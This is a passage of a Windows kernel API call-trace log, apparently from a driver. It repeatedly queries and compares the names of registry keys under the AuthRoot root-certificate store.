| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2BB1F53E550C1DC5F1D4E6B76A464B550602AC21, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2BB1F53E550C1DC5F1D4E6B76A464B550602AC21 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2BB1F53E550C1DC5F1D4E6B76A464B550602AC21, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2BB1F53E550C1DC5F1D4E6B76A464B550602AC21 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2BB1F53E550C1DC5F1D4E6B76A464B550602AC21, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2BB1F53E550C1DC5F1D4E6B76A464B550602AC21 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2C8AFFCE966430BA04C04F81DD4B49C71B5B81A0, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2C8AFFCE966430BA04C04F81DD4B49C71B5B81A0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2C8AFFCE966430BA04C04F81DD4B49C71B5B81A0, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2C8AFFCE966430BA04C04F81DD4B49C71B5B81A0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2C8AFFCE966430BA04C04F81DD4B49C71B5B81A0, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2C8AFFCE966430BA04C04F81DD4B49C71B5B81A0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2D0D5214FF9EAD9924017420476E6C852727F543, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2D0D5214FF9EAD9924017420476E6C852727F543 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2D0D5214FF9EAD9924017420476E6C852727F543, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2D0D5214FF9EAD9924017420476E6C852727F543 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2D0D5214FF9EAD9924017420476E6C852727F543, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2D0D5214FF9EAD9924017420476E6C852727F543 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2DE16A5677BACA39E1D68C30DCB14ABE22A6179B, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2DE16A5677BACA39E1D68C30DCB14ABE22A6179B | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2DE16A5677BACA39E1D68C30DCB14ABE22A6179B, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2DE16A5677BACA39E1D68C30DCB14ABE22A6179B | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2DE16A5677BACA39E1D68C30DCB14ABE22A6179B, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2DE16A5677BACA39E1D68C30DCB14ABE22A6179B | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2E14DAEC28F0FA1E8E389A4EABEB26C00AD383C3 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
